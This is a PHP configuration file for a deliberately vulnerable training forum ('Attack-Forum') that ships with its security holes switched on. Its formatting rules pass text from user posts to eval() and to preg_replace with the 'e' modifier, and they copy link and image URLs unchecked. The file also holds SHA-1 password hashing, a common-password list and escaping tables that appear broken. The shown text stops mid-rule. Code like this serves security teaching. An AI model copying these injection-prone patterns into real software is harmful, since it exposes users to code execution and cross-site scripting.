Attack-Forum
<?php // charset=iso-8859-1 / tabs=8 / lines=cr+lf / GPL (c) 2019 by Michael Engelke
// Basic settings of the forum. Comments are translated from the German originals.

// Config file that supplies the $cfg variable.
$config = 'xssconfig.php';
// Forum title (plain text).
$title = 'Attack-Forum';
// Use the browser cache.
$cache = true;
// Custom CSS (URL), false for none.
$css = false;
// Custom logo (URL), false for none.
$logo = false;
// Custom favicon (URL), false for none.
$icon = false;
// Write permission for guests.
$gast = false;
// Overwrite the last backup.
$owbu = false;
// Save the database on error/destruction.
$svdb = true;
// Show the imprint in the menu.
$imps = true;
// Reachable over the Internet without forced login.
$inet = true;
// Allow new user registration.
$user = true;
// Check Internet addresses via DNS.
$ipck = true;
// Allow indexing by web crawlers.
$craw = true;
// Enable the security holes ($leak=1 for PHP code injection, per the author's note).
// NOTE(review): as shipped, $leak, $inet, $user and $craw are all switched on, i.e. the holes are
// active while the forum is open to the Internet, to new sign-ups and to crawlers. Keep such an
// instance on an isolated lab host or network, or turn these switches off before exposing it.
$leak = true;
// SQLite database file: ".<script name without .php>.<$bext if set, otherwise sdb>".
$base = sprintf('.%s.%s', basename(__FILE__, '.php'), isset($bext) ? $bext : 'sdb');
// Local path used to make external links available offline.
$home = './media';
# Harmless URLs and data used by the attack demonstrations.
# NOTE(review): '_wordlist_' is a list of commonly chosen passwords; outside this training context
# the same kind of list belongs in a password policy as a deny-list for new passwords.
$attack = array(
    '_xlink_'    => 'http://example.com',
    '_glink_'    => 'http://bing.de#/bing.html',
    '_elink_'    => 'http://evil.com#/evil.html',
    '_flink_'    => 'http://get.adobe.com/de/flashplayer/',
    '_nlink_'    => 'http://nyan-cat.com/nyan-cat-fly.swf',
    '_clink_'    => 'http://placekitten.com#/placekitten.php',
    '_hlink_'    => 'http://heise.de/security/#/security.html',
    '_blink_'    => 'http://mengelke.de/uploads/Projekte/AttackForum/banner.gif',
    '_ylink_'    => 'http://youtube.com/embed/XYME7SJi4R8?&autoplay=1#/rickrolling.html', // DLzxrzFCyOs, (Y1g2Cx03L2I)
    '_bnlink_'   => false, // $self/bnps.js
    '_jsleak_'   => 'location.pathname', // "'http://localhost/xssforum.php'"
    '_charlist_' => 'abcdefghijklmnopqrstuvwxyz',
    // The literal is trimmed and every whitespace run (line breaks included) becomes one space,
    // so the value is a single space-separated line.
    '_wordlist_' => implode(' ', preg_split('/\s+/', trim('12 23 42 69 96 pi
*** 000 007 123 666 abc bob bot car cat cia fbi gay god
jim guy pie nsa sex **** 0000 1111 1234 baby ball bike boss dick
chef gott fuck ipad ipod jack john kitt lexy love mike nike pass sexy
shit test tits xbox ***** 00000 12345 54321 67890 09876 admin adobe alarm angel
apple buffy bundy chick elvis hallo hello jesus kitty motor nokia pussy robot spike
****** 000000 111111 123123 123456 53cr37 654321 666666 696969 abc123 access andrew ashley azerty
bailey batman beetle biteme buddha buster cherry daniel dragon ficken fuckme geheim george guitar
hallo1 harley hockey hunter iphone jordan joshua killer lovely master mobile monkey nicole qaywsx
qazwsx police qwerty qwertz ranger robert schatz secret shadow soccer summer thomas sweaty tigger
1234567 asshole beatles bigbobs bigdick bond007 charlie demo123 ferrari freedom fucking fuckoff fuckyou ironman
jessica lesbian letmein michael mustang nirvana pass123 patrick pokemon samsung test123 testing walmart welcome
******** 12345678 1q2w3e4r 1qay2wsx 1qaz2wsx babydoll babygirl
baseball butthead cencored computer football fussball hallo123
harddisk iloveyou jennifer kennwort kittycat lacrosse michelle
mohammed p455w0rd passw0rd password passwort princess pussycat
startrek starwars sunshine superman trustno1 usbdrive zensiert
123456789 1qa2ws3ed adminpass arschloch asdfghjkl cellphone metallica
microsoft password1 passwort1 raspberry schalke04 spiderman swordfish
webmaster 1234567890 lockerroom sexmachine uncencored sagichnicht administrator'))),
);
# Security questions for a forgotten password (taken from real-world practice, slightly reworded).
# Index 0 is the "please choose" entry of the list.
# NOTE(review): answers to questions like these are often guessable or publicly discoverable, so
# they are a weak recovery factor, and the last entry asks for payment-card digits. Treat the list
# as an illustration of the pattern, not as a recommendation.
$pass = array(
    ' Bitte Wählen...',
    'Was steht auf der Unterseite Ihrer Maus?',
    'Wie war Ihr erstes Kennwort?',
    'Wie hieß Ihr Haustier in Ihrer Kindheit?',
    'Wie heißt Ihr Lieblingsbuch?',
    'Wo haben sich Ihre Eltern kennengelernt?',
    'Wie heißt Ihr Lieblingsfilm?',
    'In welcher Strasse sind Sie aufgewachsen?',
    'Wie heißt Ihr Lieblingslied?',
    'Welchen Strand haben Sie zuerst betreten?',
    'Wie hieß Ihr erster Vorgesetzter?',
    'Wie hieß Ihr Stofftier in Ihrer Kindheit?',
    'Was war der Beruf Ihres Großvaters?',
    'Wo haben Sie Ihren Partner kennen gelernt?',
    'Mit wem tranken Sie Ihr erstes Bier?',
    'Wie hieß Ihr erstes gekauftest Musikalbum?',
    'Wie war der Mädchenname Ihrer Mutter?',
    'Wie hieß Ihr Bester Freund in Ihrer Kindheit?',
    'Wie hieß Ihr erster Film ab 18 Jahren?',
    'Wie hieß die Stadt, in der Sie geboren wurden?',
    'Wie heißt Ihre Lieblingssportmannschaft?',
    'Wie sind die letzten 4 Ziffern ihrer Kreditkarte?',
);
# Password hasher / HTML and ASCII escaping / JavaScript minification
# $hash: SHA-1 on both the PHP and the JavaScript side. The elements are the algorithm name, the URL of a
# JavaScript implementation and two JavaScript function names (presumably self-test and hex digest - confirm).
# NOTE(review): SHA-1 is a fast general-purpose hash, not a password-hashing function, and the script URL is
# plain http on a third-party host. Possibly deliberate in this training forum; elsewhere use password_hash().
$hash = array('sha1','http://pajhome.org.uk/crypt/md5/2.2/sha1-min.js','sha1_vm_test','hex_sha1'); // SHA-1 with PHP & JavaScript
# NOTE(review): in this listing every key of $html and $uml maps to itself. An escaping table would map to
# entities, so the values were presumably entity-decoded when the page was extracted - confirm against the
# original file before relying on these two tables.
$html = array('&' => '&', '<' => '<', '>' => '>', '"' => '"', "'" => "'");
$uml = array('ä' => 'ä', 'ö' => 'ö', 'ü' => 'ü', 'ß' => 'ß', 'Ä' => 'Ä', 'Ö' => 'Ö', 'Ü' => 'Ü'); // ' ' => ' '
# $js: pattern with the i and x modifiers; per the heading above it is the JavaScript minifier rule.
$js = '/(?<!else)\s*?\/\/\s[^\r\n]+\s* |(?<=\w)\s*(?=\s\w) |\s*[\r\n]+\s* |(?<=else\s)\s*(?=\w) |\s+(?=[\/][^\/])
|\s+(?=[!&(--:-?|]{1,2}) |(?<=[!&(--:-?|\/])\s+ |\s*(?=\{) |(?<=\{)\s* |;\s*(?=\}|<\\\\?\/|$)/ix';
// JavaScript settings for CryptChat.
// NOTE(review): both helper scripts are fetched over plain http from third-party hosts. Whoever can
// alter that traffic controls the chat's cryptography, so outside a lab serve them locally or over
// HTTPS with integrity checking. A 1024-bit modulus is also below current size recommendations.
$jschat = array(
    // Modulus written in base 36, described by the author as a 1024-bit prime.
    'prime' => implode('', array(
        'SX5JX5ET7NYKTUHIA87AP57LZ76IOPL1Z9I1LOKG8WRKQUEVRJ136LQCQYRJR6E4HV0DEBXWX5143JJID1TAZ3MXMWNHZIVGPH0',
        'VM87M06SUKH7707G1AEHK7OROB95TYSDN0DDC6OJVC4HC47OSEKUDBSIVUP0TSIYGAQPTBXRXBSPQOMENCNLSY8T3ZAA2D8ASGN',
    )),
    // Global constant for the Diffie-Hellman key exchange (false = generate automatically).
    'main' => false,
    // Radix of the numbers (2-36).
    'base' => 36,
    // Scripts used for the encryption.
    'crypt' => array(
        'int' => 'http://peterolson.github.io/BigInteger.js/BigInteger.min.js', // http://silentmatt.com/biginteger/
        'aes' => 'http://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js', // http://code.google.com/p/crypto-js/#AES
    ),
);
# Forum formatting rules: regex pattern => replacement (wiki-style markup, "html-light" tags and BBCode).
# How the table is applied is outside this view (presumably one preg_replace() over the post text - confirm).
# NOTE(review): for every pattern that carries the "e" modifier the replacement string is executed as PHP
# code on each match, after the captured groups have been substituted into it; several replacements call
# eval() on top of that. The "e" modifier was deprecated in PHP 5.5 and removed in PHP 7.0, and each()
# (used in the <<function ...>> rule) was removed in PHP 8.0, so this table only works on old PHP 5 releases.
# Code that is not meant to be a vulnerable lab target expresses such rules with preg_replace_callback().
$creole = array(
'/(~?)\\\\x([89a-f][\da-f])|[$ ]|&(?!#?x?[\w-]+;)|(?<!~)~ /ie' => # Escape characters & \x1f ('"&#".ord("$0").";"',)
'("$0" == "~ ") ? " " : (("$2") ? (("$1") ? substr("$0",1) : chr(hexdec("$2"))) : strtr(htmlentities("$0"),array("$" => "$")))',
'/(~?)(?:\<|<){3}(\w+)\s*(.*?)\s*(?:\>|>){3}/es' => # <<<x>>> (placeholder, looked up in $creoleph)
'("$1") ? strtr(substr(@"$0",1),array("<" => "<")) : ((isset($creoleph["$2"])) ? ((is_string($creoleph["$2"]))
? ((is_callable($creoleph["$2"])) ? $creoleph["$2"](@"$3") : $creoleph["$2"])
: preg_replace(array_keys($creoleph["$2"]),array_values($creoleph["$2"]),@"$3")) : (("$2" == "_") ? "" : @"$3"))',
'/\{\{\{\s*((?:[^{}]++|\{(?1)\})*|.*?)\s*\}\}\}/es' => # {{{ preformatted }}}
'"<pre>".preg_replace(array("/(?<=&)([gl])t(?=;)/e",
"/\\\\\\\\\\\'|(&#?\w+;)|(?![\x80-\xff])[[:punct:]]|(?<=[a-z\d])[A-Z]/e","/\r?\n/"),array("((\"\\$1\" == \"l\") ? \"#60\"
: \"#62\")","((\"\\$1\") ? \"\\$1\" : \"&#\".ord(substr(\"\\$0\",-1)).\";\")","<br />"),"$1")."</pre>\r"',
# The tag names listed in the inner pattern of this rule are the only ones it rewrites.
'/(?:<|<)(\w+)(?:>|>).*?(?:<|<)\/\1(?:>|>)/se' => # <tag>html-light</tag>
'(($x = "$0" and $z = "\x5c") ? eval(\'while(preg_match(\\\'/(?:<|<)([bipqsu]|abbr|acronym|big|c(?:it|od)e|del|dfn|em|h[1-6]|ins'
.'|kbd|pre|samp|small|str(?:ike|ong)|su[bp]|tt|var)(?:>|>)(.+?)(?:<|<)\/\\\\1(?:>|>)/s\\\',$x,$y,PREG_OFFSET_CAPTURE))
$x = substr($x,0,$y[0][1])."<_{$y[1][0]}>{$y[2][0]}<_/{$y[1][0]}>".substr($x,$y[0][1] + strlen($y[0][0]));
return preg_replace("/(?<=<)_(?=\/?\w+>)|$z$z(?=[\\\'\"])/","",$x); \') : 0)',
'/(?:&(?:amp;)?|\?)#(0*(?:1(?:2[89]|[3-9]\d)|[2-9]\d\d|\d{4,})|x0*(?:[89a-f][\da-f]|[\da-f]{3,}));|\\\\u(?:\{(?=(?:\w+)\}))?([\da-f]+)\}?/ei' => # ģ / \u123
'("$1") ? "&#$1;" : "&#x$2;"',
# NOTE(review): the two rules below copy the captured href/src value into the attribute as matched; no
# allow-list of URL schemes is visible in the rule itself. Possibly intentional for the training scenarios.
'/(?:<|<)a\s[^>]*?href=\s*("|&\#39;|["\']?)((?:[^>&\s"\']|&(?!gt;))+)\1[^>]*?(?:>|>)\s*(.*?)\s*(?:<|<)\/a(?:>|>)/ie' => # <a href="link">text</a>
'\'<a href="$2" rel="nofollow" target="blank">\'.((\'$3\') ? \'$3\' : \'$2\').\'</a>\'',
'/(?:<|<)img[^>]*?src=\s*("|&\#39;|["\']?)((?:[^>\s&"\']|&(?!gt;))+)\1[^>]*?(?:>|>)/i' => # <img src="">
'<img src="$2" alt="$2" border="0" />',
'/^$/' => '', # -> smilies & forum extensions go here!
'/\[(\w+)[^\]]*\].*?\[\/\1\]/es' => # [bbcode=option]text[/bbcode]
'(($x = "$0") ? eval(\'while(preg_match(\\\'/\[(\w+)(?:=([^\]]+))?\](.*?)\[\/\\\\1\]/s\\\',$x,$y,PREG_OFFSET_CAPTURE)) {
$y = array($y[0],strtolower($y[1][0]),$y[2][0],$y[3][0]); if(preg_match("/^([ibus]|center)$/",$y[1])) {
$z = array("b"=>"strong", "i"=>"em", "u"=>"ins", "s"=>"del", "center"=>"center"); $z = "<{$z[$y[1]]}>$y[3]</{$z[$y[1]]}>"; }
elseif($y[1] == "list" and preg_match("/^[1ia]?$/i",$y[2]) and strstr($y[3],"[*]")) $z = strtr(($y[2] == "")
? "<ul>$y[3]</li></ul>" : (($y[2] == 1) ? "<ol>$y[3]</li></ol>" : "<ol type=\"$y[2]\">$y[3]</li></ol>"),array("[*]" => "<li>"));
elseif(preg_match("/left|right/",$y[1])) $z = "<div align=\"$y[1]\">$y[3]</div>";
elseif(preg_match("/^(font|color|size)$/",$y[1]) and preg_match("/^[\w&#;-]+$/",$y[2])) $z = "<font ".(($y[1] == "font")
? "face" : $y[1])."=\"$y[2]\">$y[3]</font>"; elseif($y[1] == "code") $z = "<pre>"
.preg_replace("/(?![&#;<>=\"\/])[[:punct:]]/e","\"&#\".ord(\"\\$0\").\";\"",$y[3])."</pre>"; elseif($y[1] == "img")
$z = "<img src=\"$y[3]\" alt=\"".basename($y[3])."\" border=\"0\">"; elseif(preg_match("/^(link|url)$/",$y[1]))
$z = "<a href=\"".str_replace(" ","%20",($y[2]) ? $y[2] : $y[3])."\" target=\"_blank\" rel=\"nofollow\">".((trim($y[3]))
? trim($y[3]) : $y[2])."</a>"; elseif($y[1] == "email") $z = "<a href=\"mailto:".rawurlencode(($y[2] != "") ? $y[2]
: $y[3])."\">".preg_replace("/(?![&#;<>=\"\/])[[:punct:]]/e","\"&#\".ord(\"\\$0\").\";\"",$y[3])."</a>";
elseif($y[1] == "quote") $z = "<blockquote>".(($y[2] != "") ? "<address>$y[2]</address>" : "")."$y[3]</blockquote>";
elseif($y[1] == "audio" and preg_match("/^(aac|mp[ag1-4]|m4a|og[ga]|wav|pcm)(;js)?$/",$y[2],$z))
$z = preg_replace(((isset($z[2])) ? "/^(.*)$/es" : "/^$/"),"\"<script type=\x27text/javascript\x27>document.write(\x27\"
.strtr(\"\$1\",array(\"/\" => \"\/\")).\"\x27);</script>\"","<audio autobuffer controls><source src=\"$y[3]\" type=\"audio/"
.preg_replace(array("/mp[123ag]/","/m4a/","/og[ga]/"),array("mpeg","mp4","ogg"),$z[1])."\" /><a href=\"$y[3]\">$y[3]</a></audio>");
elseif($y[1] == "video" and preg_match("/^(youtube|dailymotion|(mp4|ogg))(?:;(\d+)x(\d+))?(?:;(js|left|right))?$/",$y[2],$z)
and (preg_match("/^\w+$/",$y[3]) or $z[2])) $z = ($z[2]) ? preg_replace(((isset($z[5])) ? "/^(.*)$/es" : "/^$/"),
"\"<script type=\x27text/javascript\x27>document.write(\x27\".strtr(\"\$1\",array(\"/\" => \"\/\")).\"\x27);</script>\"",
"<video src=\"$y[3]\" type=\"video/".substr($z[2],-3)."\"".((isset($z[3])) ? " width=\"$z[3]\"" : "").((isset($z[4]))
? " height=\"$z[4]\"" : "").((preg_match("/#(.*)$/",$y[3],$z)) ? " poster=\"$z[1]\" preload=\"none\"" : "")
." autobuffer controls><a href=\"$y[3]\">".(($z) ? "<img src=\"$z[1]\" />" : $y[3])."</a></video>")
: "<iframe src=\"http://www.".strtr(strtr($z[1],array("youtube" => "youtube.com/embed/#", "dailymotion" =>
"dailymotion.com/embed/video/#")),array("#" => $y[3]))."\" width=\"".((isset($z[3])) ? $z[3] : 640)."\" height=\""
.((isset($z[4])) ? $z[4] : 480)."\"".((isset($z[5]) and $z[5] != "js") ? " align=\"$z[5]\"" : "")." frameborder=\"0\"></iframe>";
else $z = $y[3]; $x = substr($x,0,$y[0][1]).$z.substr($x,$y[0][1] + strlen($y[0][0])); } return $x; \') : 0)',
'/\[\[\[((?:[^\[\]]++|\[(?1)\])*|.*?)\]\]\]/es' => # [[[ Pre-Linebreaks ]]]
'preg_replace(array("/\\\\\\\\\\\\\\\\\r?\n/","/\r?\n/","/~([^~])/e"),array("","<br />","\"&#\".ord(\"\$1\").\";\""),"$1")',
'/(?<=^|\s)\/\*\s.*?\*\/(?=\s|$)|(?<!^|~)~\r?\n|^[ \t]+$/sm' => # /* comment */
'',
'/^(([ \t].*([\r\n]+|$))+)/em' => # preformatted
'"<pre>".preg_replace(array("/\\\\\\\\x5c+(?=[\'\"])/","/~(&#?\w+;|[^~])/e","/\s*[\r\n]+/"),array("","\"&#\"
.ord(html_entity_decode(\"\\$1\")).\";\"","<br />"),"$1")."</pre> "',
'/\?\?\s*(\w+)(?:\s*([:=])\s*(.+?))?\s*\?\?/e' => /* ??key=val?? / ??key?? */ 'eval(\'
return ($x = "$1" and $y = preg_replace("/\?(\w+)\??/e","((isset(\\\\$creolevar[\"_\$1\"])) ? \\\\$creolevar[\"_\$1\"]
: \"\$0\")","$3")) ? (($creolevar["_$x"] = $y and "$2" == "=") ? "" : $y) : ((isset($creolevar["_$x"])) ? $creolevar["_$x"]
: "");\')',
'/(?<=^|[\r\n])(~?)((={1,6})=*(&(?:[gl]t|#6[02]);|[<^>]?)\s*(?:%(\w+)%)?\s*(.+?)[\s=]*?(\[\[#\w+\]\]|#)?(?:\r?\n|$))/e' => # =Title= [[#anchor]]
'("$1") ? "$2" : ($x = (("$7" == "#") ? "[[#".preg_replace(array("/[^a-z\d]+/i","/^(?=\d+)/"),array("","al"),"$6")."]]"
: "$7"))."<h".strlen("$3").(("$4") ? preg_replace(array("/<|&(lt|#60);/","/\^/","/&(gt|#62);|>/"),
array("left","center","right")," align=\"$4\"") : "").(("$5") ? " class=\"$5\"" : "").">"
.($y = preg_replace("/(<.*?>)|(?![~&#;])([!-\/:-@\[-`\{-~])/es","(\"\\$1\") ? \"\\$1\" : \"&#\".ord(\"\\$2\").\";\"","$6"))
."</h".strlen("$3").">\r".(("$7" and $creolevar[".al"][substr($x,3,-2)] = $y) ? "" : "")',
'/(?<!@)@@(.*?)@@(?!@)/es' => # @@fixed@@ (rendered as <code>)
'"<code>".preg_replace(array("/\\\\\\\\x5c+(?=[\'\"])/","/~(&#?\w+;|[^~])/e"),
array("","\"&#\".ord(html_entity_decode(\"\\$1\")).\";\""),"$1")."</code> "',
'/(?<![!-]|[@\/.]xn)--(?!-)([^\r\n]+?)(?<!-)--(?!-)/' => # --small--
'<small>$1</small>',
'/(?<!~)~~(.+?)~~(?!~)/' => # ~~strikethrough~~
'<del>$1</del>',
'/(?<!_)__(.+?)__(?!_)/' => # __underlined__
'<ins>$1</ins>',
'/(?<!#)##(?!\s)(.+?)(?<!\s)##(?!#)/' => # ##typewriter## (rendered as <tt>)
'<tt>$1</tt>',
'/(?<!\^)\^\^(.+?)\^\^(?!\^)/' => # ^^superscript^^
'<sup>$1</sup>',
'/(?<!,),,(.+?),,(?!,)/' => # ,,subscript,,
'<sub>$1</sub>',
'/\*\*(?!\s)((?:[^\n]*?(?<!\*)|(?<![\r\n]|\*\*)\r?\n(?!\r?\n|\*\*)){1,3})(?<!\s)\*\*/' => # **bold**
'<strong>$1</strong>',
'/(?<!\{)\{\{(?!\{)\s*(&(?:[gl]t|#6[02]);|[<>]?)\s*([+-]?)\s*(?:%(\w+)%\s*)?(:|;|https?:|\/)?([^#|}<>]+)(?:#(\d+)[x*.-](\d+)|[^|}]*?)?\s*(?:\|\s*([^|}]*)(?:\|([^}]+))?)?\s*(?<!\})\}\}(?!\})/e' => # {{<>+-%class%image#width-height|note|style}}
'preg_replace("/&(?!#?\w+;)/","&","<img ".(("$2") ? "class=\"$3\"" : "")."src=\"".(("$4" == ":") ? "http://" : (("$4" == ";") ? "https://" : "$4"))
.preg_replace("/[\s\x80-\xff]+/e","urlencode(\"\$0\")","$5")."\"".(("$6" and "$7") ? " width=\"$6\" height=\"$7\"" : "")
." alt=\"$8\" title=\"$8\" border=\"".(("$2" == "+") ? 1 : 0)."\"".(("$9") ? " style=\"$9\"" : "")
.(("$1") ? preg_replace(array("/<|&(lt|#60);/","/&(gt|#62);|>/"),array("left","right")," align=\"$1\"") : "")." />")',
'/(~|[&\#\w;]+(?<!-)-?)?\[\[\s*(\^|%\w+%\s*)?(?:([^\]]+)\s*-(?:\>|>|&\#62;)\s*)?(~?\(?(?:https?|ftp|mailto)?:|;|~?[\/\#])?([^|\]]+?)(?:\^([^|\]]+)\^)?(?:\s*\|\s*([^\]]+))?\s*\]\]((?:-?(?!-)[&\#\w;]+)+)?/e' => # pre[[%class%Link_~(url~)(?hidden)^Title^]]end / [[%class%Link^Title^|Text]] / [[%class% Text -> Link^Title^]]
'("$1" == "~") ? substr(@"$0",1) : "<a ".(("$2") ? "class=\"".(("$2" == "^") ? "home" : preg_replace("/\W+/","","$2"))."\" " : "")
.((preg_match("/^~?(http|:|;)/","$4")) ? "target=\"_blank\" rel=\"nofollow\" " : "").(("$6" != "") ? "title=\"$6\" "
: "").preg_replace("/&(?!#?\w+;)/","&",((substr("$4",0,1) == "#" && "$3$7" == "") ? "name=\"$5\">$1$8"
: (("$2" == "" and substr("$4",0,1) == "#") ? "class=\"anchor\" " : "")."href=\"".((substr("$4",0,1) == "~")
? (($x = preg_replace("/!!(.*?)!!/e","rawurlencode(\"\$1\")",substr("$4",1)."$5") and "$1$3$7$8") ? "$x\">$1$3$7$8"
: "$x\">$x"): preg_replace(array("/(?:[\\\\\\\\x5c~]([(+~)])|([\s\x80-\xff]+))/e","/&(?!amp;)#?x?\w+;/e","/[()]/"),
array("rawurlencode(\"\$1\$2\")","urlencode(html_entity_decode(\"\$0\",ENT_QUOTES))",""),(("$2$4" == "^")
? "$_SERVER[SCRIPT_NAME]/" : (("$4" == ":") ? "http://" : (("$4" == ";") ? "https://" : "$4")))."$5")."\"".">"
.((($x = (("$3$7" && "$3$7" != "+") ? "$1$3$7$8" : "$1"
.preg_replace("/(^(?=[^(]*\))|(?<![\\\\\\\\x5c~])\().+?((?<![\\\\\\\\x5c~])\)|$)|[\\\\\\\\x5c~](?![\\\\\\\\x5c~])|^[:;]/",
"","$4$5")."$8")) && "$3$7" == "+") ? preg_replace(array("/%[\da-f]{2}/ei",
"/[_+]|(?<=[[:lower:]\d])(?=[[:upper:]])|(?<=[^-\d])(?=\d[-\d]*( |$))|(?<=[[:upper:]])(?=[[:upper:]][[:lower:]\d])/u"),
array("urldecode(\'\$0\')"," "),$x) : $x)))."</a>")',
'/(?<![\w\/+])\+\+(.+?)\+\+(?![\w\/+])/' => # ++big++
'<big>$1</big>',
'/(?<!http:|https:|ftp:|[\w\/+])\/\/(?!\s)((?:[^\n]+?|(?<![\r\n]|\/\/)\r?\n(?!\r?\n|\/\/)){1,3})(?<!http:|https:|ftp:|\s)\/\/(?![\w\/+])/' => # //italic//
'<em>$1</em>',
'/(?:^|(?<=[\r\n]))(~?)((?:[;:>]|>)(?:.*\r?\n(?=(?:[;:>\w]|>))|.*)+)/e' => /* # definition lists */
'(@$x = strtr("$2",array("\\\'" => "\'"))) ? eval(\'if(!"$1"
and preg_match_all("/(?<=^|\s|\W)([;:]+)\s*((?:.*?(?=[\s\W][;:]|$)|(?<=\w)[;:])+)[ \t]*/s",
preg_replace(array("/(?<=^|\n)(>|>)+/e","/&(?!#?\w)/"),array("str_replace(array(\">\",\">\"),\":\",\"\$0\")","&"),
$x),$ay)) { $x = ""; $z = 0; foreach($ay[2] as $k => $v) { $w = strlen($ay[1][$k]) - $z;
$y = (substr($ay[1][$k],0,1) == ";") ? "t" : "d"; if($w > 0) { $u = 1; while($u++ < $w) { $x .= "<dd><dl>"; $z++; }}
elseif($w < 1) while($w++ < 1) { $x .= "</dl></dd>"; $z--; } $x .= "<d$y>".trim($v)."</d$y>"; } while($z--)
$x .= "</dl></dd>"; $x = "<dl>$x</dl>"; } return $x; \') : 0',
'/(?:^|(?<=[\r\n]))(~?)((?:\*|#)+(?![*#\r\n]).+?)(?=\r?\n(?![*#])|$)[ \t]*(?![*#])/es' => /* # bulleted / numbered lists */
'(@$x = strtr("$2",array("\\\'" => "\'"))) ? eval(\'if(!"$1" and
preg_match_all("/^(\*+|#+)(?:([acdins])?(\d+)?(?<=\w)[*#])?\s*(.*?)\s*$/mi",preg_replace("/&(?!#?\w)/","&",$x),$ay)) {
$x = ""; $z = array(); foreach($ay[4] as $k => $v) { $w = strlen($ay[1][$k]) - count($z);
$y = (substr($ay[1][$k],0,1) == "*") ? "u" : "o"; if($w > 0) { $u = 1; while($u++ < $w) { $x .= "<dl><dd>"; $z[] = "dl"; }
$x .= "<{$y}l".(($ay[2][$k]) ? " type=\"".strtr($ay[2][$k], array("d" => "disc", "c" => "circle", "s" => "square",
"n" => "none"))."\"" : "").">"; $z[] = $y."l"; } elseif($w < 0) while($w++ < 0) $x .= (($u = array_pop($z)) == "dl")
? "</dd></dl>" : "</li></$u>"; if(end($z) != $y."l") { $x .= (($u = array_pop($z)) == "dl") ? "</dd></dl><{$y}l>"
: "</li></$u><{$y}l>"; $z[] = $y."l"; } $x .= "<li".(($ay[3][$k]) ? " value=\"{$ay[3][$k]}\"" : "").">$v"; }
while($u = array_pop($z)) $x .= ($u == "dl") ? "</dd></dl>" : "</li></$u>\r"; } return $x; \') : 0',
'/(?<=^|[\r\n])(~?)(\|.*?)(?=\n(?!\|)|$)[ \t]*(?!\|)/es' => /* | table | */ '(@$x = strtr("$2",array("\\\'" => "\'"))) ? eval(\'
if(!"$1" and preg_match_all("/^\|(.*?)\|?\s*$/m",preg_replace(array("/^\|[^=|\n]*\r?\n/","/&(?!#?\w)/"),
array("","&"),$x),$ay)) { foreach($ay[1] as $k => $v) { $ay[0][$k] = preg_split("/(?<!~)\|/",$v);
$ay[2][] = count($ay[0][$k]); $x = -1; foreach($ay[0][$k] as $u => $w) if($w != "") $x = $u; elseif($x >= 0 && $w == "") {
$ay[3][$k][$x] = (isset($ay[3][$k][$x])) ? $ay[3][$k][$x] + 1 : 1; unset($ay[0][$k][$u]); }}
if(count(array_unique($ay[2])) > 1 and $u = min($ay[2])) foreach($ay[0] as $k => $x) $ay[0][$k] = array_slice($x,0,$u);
foreach($ay[0] as $k => $trow) { $ay[1][$k] = "<tr>"; foreach($trow as $x => $tcell)
if(preg_match("/^(=?)([ \t]*)(.*?)([ \t]*)$/",$tcell,$v)) $ay[1][$k] .= "<t".(($v[1] != "") ? "h" : "d").((isset($ay[3][$k][$x]))
? " colspan=\"".($ay[3][$k][$x]+1)."\"" : "").(($v[2] != "" && $v[4] != "") ? " align=\"center\""
: (($v[2] != "" && $v[4] == "") ? " align=\"right\"" : (($v[2] == "" && $v[4] != "") ? " align=\"left\"" : ""))).">"
.preg_replace(array("/~\|/","/^_$/","/(?<!~)~-/"),array("|"," ","<br />"),$v[3])."</t".(($v[1] != "") ? "h" : "d").">";
$ay[1][$k] .= "</tr>"; } if(preg_match("/^\|\s*(&(?:[gl]t|#6[02]);|[<^>]?)\s*([-+])?\s*(?:%(\w+)%)?\s*(\d+%?)?\s*$/m","$2",
$v)) $v[1] = ((isset($v[1]) and $v[1]) ? preg_replace(array("/<|&(lt|#60);/","/\^/","/&(gt|#62);|>/"),
array("left","center","right")," align=\"$v[1]\"") : ""); return "<table ".((isset($v[3]) and $v[3]) ? "class=\"$v[3]\" "
: "")."border=\"".((isset($v[2]) and $v[2] == "-") ? 0 : 1)."\"".((isset($v[1])) ? $v[1] : "").((isset($v[4]) and $v[4])
? " width=\"$v[4]\"" : "").">".implode("",$ay[1])."</table>"; } return $x; \') : 0',
# NOTE(review): this rule resolves the plugin name through $creolepi and then either calls the configured
# function via call_user_func_array() or passes the configured code string to eval(); the plugin arguments
# come from the matched text. Everything registered in $creolepi is therefore reachable from forum markup.
'/(~?)(?<!<|<)((?:\<|<){2}(\w+)\s*(.*?)\s*(?:\>|>){2})/e' => /* <<function ...>> */
'(@$x = array("$3",strtr("$4",array("\\\'" => "\'"))) and !"$1" and
preg_match_all("/(?:(\w+)=)?(?:(\'|&(?:amp;)?(?:#34|#39|quot);)(.*?)(?<!\\\\\x5c|\)\\\\\\\2|(\S+))|(\S+)|^$/",$x[1],$y)
and ((isset($creolepi[$x[0]]) and $x[2] = $creolepi[$x[0]] or 1) and !eval(\'while($z = each($y[3])) $y[(($y[1][$z[0]])) ? 6
: 7][$z[0]] = ($z[1]) ? $z[1] : $y[4][$z[0]]; if(isset($x[2]) and isset($x[2][1])) { $x[3] = (is_array($x[2])) ? $x[2][0]
: $x[2]; if(is_array($x[2][1])) { $x[4] = array_flip($y[1]); foreach($x[2][1] as $z) { if(isset($x[4][$z])) {
$x[5][$z] = $y[6][$x[4][$z]]; unset($y[6][$x[4][$z]]); } elseif(preg_match("/^(\w+)\?$/",$z,$y[8])) { $z = $y[8][1];
if(isset($x[4][$z])) { $x[5][$z] = $y[6][$x[4][$z]]; unset($y[6][$x[4][$z]]); } elseif($y[8] = each($y[7])) {
$x[5][$z] = $y[8][1]; unset($y[7][$y[8][0]]); }} elseif($y[8] = each($y[7])) { $x[5][$z] = $y[8][1];
unset($y[7][$y[8][0]]); } else { unset($x[5]); $x[2][1] = count($x[2][1]); break; }}} if(is_int($x[2][1]) and $x[2][1]
and count($y[0]) >= $x[2][1]) for($z=0;$z<$x[2][1];$z++) $x[5][$z] = (isset($y[6][$z])) ? $y[6][$z] : $y[7][$z]; }
if(isset($x[2][1]) and is_int($x[2][1]) and !$x[2][1] and count($y[0]) or !isset($x[2])) { for($z=0;$z<count($y[0]);$z++)
$x[5][$z] = ($y[3][$z]) ? $y[3][$z] : $y[4][$z]; $x[5] = array(implode(" ",$x[5])); } $z = (isset($x[5])) ? $x[5]
: ((isset($y[6])) ? $y[6] : false);\'))) ? eval(((isset($x[3]) and preg_match("/^\w+$/",$x[3]) and function_exists($x[3]))
? \'return ($z) ? @call_user_func_array($x[3],array_values($z)) : @$x[2]();\' : ((isset($x[3]) and preg_match("/[(\s;)]/",
